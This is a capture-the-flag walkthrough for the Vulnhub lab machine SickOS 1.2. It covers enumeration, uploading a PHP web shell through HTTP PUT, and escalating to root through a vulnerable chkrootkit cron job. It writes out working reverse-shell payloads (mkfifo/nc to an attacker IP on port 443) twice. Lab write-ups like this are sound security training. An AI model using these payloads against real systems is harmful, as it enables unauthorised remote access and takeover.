SickOS 1.2 is the second Boot2Root Challenge in SickOS Series and is available at Vulnhub. This is an interesting CTF and requires think-out-of-the-box mentality. This VM is intended for “Intermediates” and should take a couple of hours to get root.
In this walkthrough, I’ll be using Parrot Security OS but you can use Kali or any other distro.
Turn on the Virtual Machine and use Netdiscover to determine the IP. Then register this IP to your local DNS file “/etc/hosts”.
sudo netdiscover -r [IP/subnet] sudo nano /etc/hosts
Run a full port Nmap scan.
There is an HTTP Server running.
There’s no “robots.txt” file so we need to run a dirb scan.
dirb http://sick.local/
There’s an empty directory called “/test/”.
When we test the Server, we see that PUT and DELETE commands are enabled. Now, try to put something to the Server. Fire up Burp Suite and in Repeater, set up the host as “sick.local” and port 80 and write
PUT /test/hello HTTP/1.1 Host: sick.local Content-Length: 11 Hello World
Now, verify it using curl.
curl http://sick.local/test/hello
Next, try to PUT a PHP Reverse Shell. Note that the outbound traffic except port 443 is blocked by Firewall, so in reverse shell, use port 443
PUT /test/reverse.php HTTP/1.1
Host: sick.local
Content-Length: 107
<?php echo shell_exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f"); ?>
We got a reverse shell.
Spawn a “pty” shell.
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
Now, we got to escalate our privileges to root. After some research, I found some interesting Cron Jobs running
Check the version of “chkrootkit”.
According to exploit-DB, this version of “chkrootkit” is vulnerable to privilege escalation attacks. All you need to is to put your malicious code in “update” file in “/tmp/” directory and wait for Cron Job to execute our code.
echo '#!/bin/bash' > update echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f' >> update chmod 777 update
Now, wait for our reverse shell.
Finally, we got ROOT Privileges.